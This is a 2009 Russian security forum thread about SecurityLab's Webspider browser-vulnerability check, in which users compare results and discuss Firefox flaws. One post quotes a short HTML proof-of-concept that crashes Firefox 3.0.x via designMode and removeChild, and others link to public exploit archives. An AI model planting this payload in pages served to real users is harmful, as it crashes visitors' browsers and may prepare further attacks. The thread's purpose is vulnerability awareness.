p2u

Webspider: Экспресс-анализ защищённости

В этой теме 28 сообщений

Positive Technologies + SecurityLab запустили новый проект Webspider (пока Альфа, но сама идея - хорошая). Доработать придётся, естественно, но преимущество в том, что нам пользователям ничего устанавливать не надо. Посетитель может сразу же ознакомиться с потенциальными дырами в системе и поставить патчи.

Для того, чтобы пройти тест, необходимо перейти по ссылке: Webspider Fast Check.

Для пользователей Firefox + NoScript: требуются скрипты.

У меня они многого не обнаружили, естественно, потому что я выдернул всё, что есть (вчера прощался с Acrobat Reader'ом), но я всё же советую всем регулярно проходить этот тест:

a470ad77778e.jpg

Тому, кто хочет ещё больше узнать о том, что выдаёт браузер о системе советую идти сюда. Это уже без оценки безопасности, но всё же - то, что они видят, видят и сайты, где установлены злостные установщики зловредов. Список параметров (70+), которых можно проверить можно найти в колонке с левой стороны.

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

На самой странице browserspy.dk какая-то неустойка: кликаешь на ссылку слева - информация появляется и опускается в самый низ страницы.

Для того, чтобы пройти тест, необходимо перейти по ссылке: Webspider Fast Check.

Паул. Тест сделать не удалось. Что-то глюкнуло в анализаторе при столкновении с моим простым IE6. %)

"Альфа" опростоволосилась и написала ошибку на странице.

А сейчас даже сервер у securitylab.ru глюкнул. Все страницы в ауте, но я ведь просто хотел пройти тест. :)

Повторю попозже. :)

***

Повторил позже и уже без антивируса - не берёт. :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

у меня сработал, причем по всем браузерам навыдавал результатов. Информация к размышлению :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А мне он написал,что у меня система х86,хотя у меня х64-хотя скорее всего он смотрит систему по версии браузера.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
А мне он написал,что у меня система х86,хотя у меня х64-хотя скорее всего он смотрит систему по версии браузера.

Пока Альфа. Я за идею... ;)

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Они там до сих пор заявляют о том, что у меня норм с файрфоксом 3.0.7, хотя уязвимость всё-таки есть (если нет NoScript и скрипты включены): эта дыра позволяет удалённому злоумышленнику выполнить DoS атаку на нашу систему если мы щёлкаем не на ту ссылку. Уязвимость существует из-за ошибки в проверке входных данных. Надеюсь, что Мозилла скоро выпустит патч, и что securitylab скоро обновит базы уязвимостей... :rolleyes:

Эксплоит:

<BODY onload="document.designMode='on';//string

alert('Design mode is on!');

document.removeChild(document.firstChild);//object;

document.queryCommandState('BackColor');

alert('Close the Window to see the crash!');

">

Источник: хакер.ру

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

http://www.milw0rm.com/search.php вбиваем "exploits"

p2u, обратите внимание на дату выпуска эксплоита:

'2009-02-23 Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit'

С тех пор ни кто не "почесался".

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

@ rem

Вам плюсик, а Giorgio Maone (автор NoScript) + Wladimir Palant (автор Adblock Plus) по 10 плюсиков за то, что они уже годами спасают задницу Мозиллы и пользователей их дырявого браузера, в который всовываются всё больше и больше ненужных фичей вместо того, как наконец-то исправить некачественную обработку java-скриптов...

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Чем опасен, данный вид атаки кроме падения браузера?

бесполезный эксплоит?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Чем опасен, данный вид атаки кроме падения браузера?

бесполезный эксплоит?

Даже когда данный эксплойт не может быть использован для того, чтобы впарить код, обнаружение ошибок в проверке входных данных всегда плохая новость; есть риск, что это идёт по всей линии, и что можно использовать сам факт в других целях. Я, естественно знаю их решение: 'переходите на 3.5, там всё клёво', угу... Только срок жмёт, так что не надо удивляться если программёры и там серьёзные ляпы наделают; основной код - тот же самый, только теперь можно будет порно посмотреть, и никто, кроме некоторых знать не будет... :rolleyes:

P.S.: Теперь можно через about:blank неприятные редиректы делать на любую страницу в он-лайн и так код внедрить - автор NoScript жёстко кодировал эту страницу в доверенных, возможно по требованию самой Мозиллы...

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
что это идёт по всей линии, и что можно использовать сам факт в других целях.

какая разница, что в одном что во всей линии..

в каких других целях? ну так хочеться выяснить для общего развития=)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
в каких других целях? ну так хочеться выяснить для общего развития=)

Именно этот, или в целом? Атаки на файрфокс это обычно связано с утечкой данных (даже без установки зловредов). Этот браузер не очень хорошо работает с кэшом и с памятью. Если там что-нибудь повредить, то тогда последствия могут быть непредсказуемые. Полное падание, естественно, только детям интересно, но можно так ДДосить, что он НЕ падает, и таким образом его подготовить к другой атаке. Когда подвисает в он-лайне, программа по любому уязвима.

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Именно этот, или в целом?

в целом экслоиты, с возможностью положить браузер..

я бы тоже не стал, паниковать и сразу клепать заплатку, как разработчики браузера и поступили=)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
в целом экслоиты, с возможностью положить браузер..

я бы тоже не стал, паниковать и сразу клепать заплатку, как разработчики браузера и поступили=)

У меня этот эксплойт даже не действует, даже когда разрешаю скрипты. Это, скорее всего, мои сверх-оригинальные настройки. И я не вызываю к панике - просто все уязвимости, которые находят в этом браузере почти одного типа. Это меня бесит, но можно не обращать внимания... ;)

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

И ещё одна уязвимость. В начале следующей недели будет патч (Firefox 3.0.8):

http://www.securitylab.ru/poc/376318.php

P.S.: На securitylab заявляют, что только работает на Windows, но это не так: на *nix тоже ->

http://milw0rm.com/exploits/8285

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Спустя несколько дней снова попробовал пройти тест. Грузит страничку, грузит - в результате пусто.

И опять, IE6 - стойкий оловянный солдатик, твёрдо стоит на месте. :)

IEэху! Броня крепка и танки наши быстры...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Получается что некоторые предпочитают до сих пор пользоваться фаерфоксом 1.5.* И это вполне оправдано. :)

О FF 1.5.* уже никто не говорит - он не поддерживается, но думаю, что такой тип эксплойтов на нём тоже прекрасно работает при отсутствии NoScript. Проблема ещё в том, что Guido Landi (автор эксплойта) выложил PcO против всех правил, так что - до первого апреля надо быть осторожным всё-таки куда ходить. На Mac OS X эксплойт тоже работает. Браузер НЕ падает и память НЕ повредится если вы установили NoScript v 1.9.1.4 и вы попадёте на сайт с эксплойтом, который НЕ в белом списке и если вы запрещаете ВСЁ по умолчанию (плагины, фреймы, и пр.). В таком случае никто ничего внедрить не может.

P.S.1: Мозилла уже 6 месяцев назад получила другой PoC по этой же уязвимости, но там большинство не верили, что можно эксплойт использовать в реальной жизни ('null ptr deref'). Видимо наелись тортом, который Майкрософт им дал в прошлом году при запуске ФФ3... Но теперь всё-таки очухались:

: Exploit code at the link iframes a little xml file with an xslt transform that causes a crash reliably on 3.0 branch and trunk (and presumably 1.9.1, didn’t test). Null, but it’s being called, assuming the worst for the moment.

P.S.2: Тоже пора опять Sun Java обновить - там тоже куча критических уязвимостей...

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Тем не менее я попробовал пройти тест Webspider Fast Check из-под фаерфокса 1.5 и не получил никаких сообщений про уязвимости в отличии от теста из-под фаерфокса 2.* Конечно у меня подкручен 1.5 через about:config... А если еще и изменить general.useragent.extra.firefox на "левый" то тест вообще ничего не показывает...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Тем не менее я попробовал пройти тест Webspider Fast Check из-под фаерфокса 1.5 и не получил никаких сообщений про уязвимости в отличии от теста из-под фаерфокса 2.* Конечно у меня подкручен 1.5 через about:config... А если еще и изменить general.useragent.extra.firefox на "левый" то тест вообще ничего не показывает...

Webspider Fast Check не познаёт ФФ 1.5 (инфы нет в базах). На 2 он по любому ругается (паника! - не поддержвивается уже вендором, щас умрёте, и т.д.) У меня (фф 3.0.7) говорит, что всё клёво... Альфа продукт пока... :rolleyes:

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Webspider Fast Check не познаёт ФФ 1.5 (инфы нет в базах).

С настройками по умолчанию фаерфокс 1.5 определяется правильно и выдается сообщение о найденных уязвимых плагинах браузера: acrobat,Quicktime,SunJRE,WMP...

Не поддерживается -имхо, не так уж и плохо. Никто уязвимости не будет искать...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
С настройками по умолчанию фаерфокс 1.5 определяется правильно

А он говорит, что браузер 'устаревший', и надо обновить до ФФ3? Не думаю. Он просто тупо читает хэдеры...

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
А он говорит, что браузер 'устаревший', и надо обновить до ФФ3?

Нет,не говорит. просто выдает информацию.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
А это это такое?

Заголовки HTTP, который браузер передаёт серверу для того, чтобы с ним возможно было общаться, и чтобы тот мог бы его обслуживать. У меня, например, он говорит: 'Привет, я Firefox 3.0.8. Я сейчас на локальный порт 2382. Мой адрес в данный момент 95.24.x.x, я принимаю только такие и такие данные, у меня скрипты отключены, и печенье не хочу, так что ты не думай...' и т.д.

Откройте ссылку, и вы увидите, что ваш браузер передаёт: BrowserSpy HTTP Headers

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

p2u

Забавно, но, установив только что Flock, я наконец прошёл предложенный Вами тест. :)

Но Тест такого браузера не знает, он определил его как Mozilla Firefox 2.0.0.17 - нууу чуть-чуть ошибся. :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!


Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.


Войти с помощью Facebook Войти Войти с помощью Twitter
Anti-Malware.ru Вконтакте   Anti-Malware.ru в Facebook   Anti-Malware.ru в Twitter   Anti-Malware.ru в LinkedIn   RSS
  • Сообщения

    • Wenderoy
      Обновляю: https://mega.nz/#!0FYBnRzT!Kh8GaRMVOzm99QJZX0NsDD51vDaFzPI-Vil02kw53rQ
    • Sergey22101979s
      Площадку надо свою делать и развивать её. А потом продавать места на ней. И не важно какую площадку - сайт, группу в соцсети, или что-то тому подобное.
    • homeobed
      На дому за копейки работать - дело нехитрое) Вот чтобы зарабатывать приличные деньги, на одних комментариях далеко не уедешь)
    • Mike
      Вышел McAfee VirusScan Enterprise 8.8.0 Patch 10  
    • Wenderoy
      Да, лучше удалить. Но это, разумеется, решает администрация... Я никакой не тролль, ANDYBOND прекрасно это понимает, просто именно с ним был разлад безо всякой причины, подробности приводить не буду, но теперь он старается как можно больше "навредить" мне. Собственно, вот отзывы про PS - https://www.mywot.com/ru/scorecard/provisionsecurity.ru Думаю, комментарии будут излишними. Есть очень много свидетелей, которых "примерная" администрация Provisionsecurity даже "поливала" нецензурной лексикой, у меня есть все скриншоты и т. д. И после всего этого надо подумать, а стоит ли верить таким людям? Это я в качестве отступления. Главное - то, что я устал здесь распинаться, тратя свое личное время, что идет только на руку уже упомянутым участниками форума. Все, что мне надо было доказать, я доказал, пользователи моего приложения знают и понимают мои цели и стремления, я ни от кого ничего не скрываю. Поэтому программу уже используют многие, а это значит, что дело поставлено на рельсы. Самое смешное, что на каждый мой аргумент, который я не поленился снабдить всей необходимой информацией в форме ссылок, скриншотов, записей, копий писем, сообщений лабораторий etc, в ответ мне летят одни и те же фразы: "мошенник", "вирусописатель", "тролль". Так кто же больше попадает под значение последнего слова? Просто упомяну еще пару вещей. Когда я объяснял, почему продукт детектит пустой файл, все равно меня никто не слышал. Каким же, интересно, образом мне следует растолковать это? Были приведены доказательства, что я часть баз собираю с ресурса VirusShare (благо, имеются очень хорошие источники самой разнообразной информации), где AVP в свое время почему-то пометил файл как Trojan... (где-то на предыдущих страницах все чрезвычайно подробно описано). Так вот, копируя MD5, в комплект попала и хеш-сумма пустого файла, вследствие чего как бы Вы его ни переименовывали, все рано будет сработка продукта (кстати, ее уже нет). Далее. Насчет "мошенник" и "вирусописатель". Если зимние переписки (не просто отчетов автоматического анализа лабораторий) с вирусным аналитиком McAfee ни о чем Вам не говорят, это, как говорится, не мои проблемы. Другие вендоры, да практически все (даже популярные Avast, Qihoo и др.) устанавливаются втихомолку вместе с другим ПО (DRP Solutions, различные дополнения для монетизации в пакеты дистрибутивов), но их Вы почему-то "вирусописателями"  не называете. И последнее. Насчет "мошенник". Я никого не принуждаю устанавливать KAR, каждый делает это добровольно. Лицензионное соглашение и Privacy Statment присутствуют на сайте, там все четко и ясно описано. На сервер высылаются исключительно анонимные отчеты, как и в любых других разработках аналогичного типа, не более того.  Kuranin Anti-Ransomware распространяется абсолютно бесплатно, никакой рекламы ни в продукте, ни даже на сайте, т. к. это мое хобби. Поэтому здесь не вижу ничего, связанного с мошенничеством. Это очень краткое обобщение, все мои подробные ночные отписки на однотипные бессмысленные сообщения можно посмотреть, листая предыдущие ни много ни мало двенадцать страниц. @VMS, радует, что еще есть адекватные люди, которые умеют слушать. Да, к сожалению, это не те времена, когда жизнь кипела в каждом уголке Anti-Malware и других подобных форумов. Обидно, что перевились разработчики-добровольцы, которые были очень активны в 2004-2014 годах. Сейчас в основном крупные компании все вытеснили, да есть те, кто просто сдался (Александр Калинин, его судьба мне не известна, но смею предположить, что он воплотил свое хобби в жизнь; Kerish, который, правда, стал чрезвычайно полезной утилитой Kerish Doctor, а ведь совсем немногие знают прошлое этого творения; ScreamAV, бесплатныq антивирус то ли из Индонезии, то ли с Филиппин; путем долгого анализа удалось выяснить, что создатели данного антивируса примкнули к проекту SmadAV;  SMK антивирус, когда-то известный в узких кругах; "Зоркий глаз" Петелина Александра;  AWS Core, приостановивший свое развитие и т. п.) Вообще обожаю древние сайты, особенно варианты на narod.ru и им подобные, пропахшие стариной и историей. Очень приятные ощущения, как будто бы открыл давно забытую, но вновь найденную на чердаке книгу с пожелтевшими от времени листами.  А еще очень много полезных ресурсов, которых уже нет, но они сохранились в "архиве". Все это "богатство" сложно отыскать, но зато там есть чрезвычайно много полезной информации... Вот, кстати, один из примеров: https://web.archive.org/web/20040905203536/http://www.winchanger.narod.ru:80/ Или https://web.archive.org/web/20070624081145/http://winchanger.whatis.ru:80/ Как бонус прилагаю собственную коллекцию малоизвестных продуктов любителей информационной безопасности, среди них, кстати, все вышеупомянутые образцы! https://mega.nz/#!tZBkkCKa!0WzfYt4A1zK4aCvVLtu3FLt7pfPIp7wWtyPIr9c-cbo Может, кому пригодится...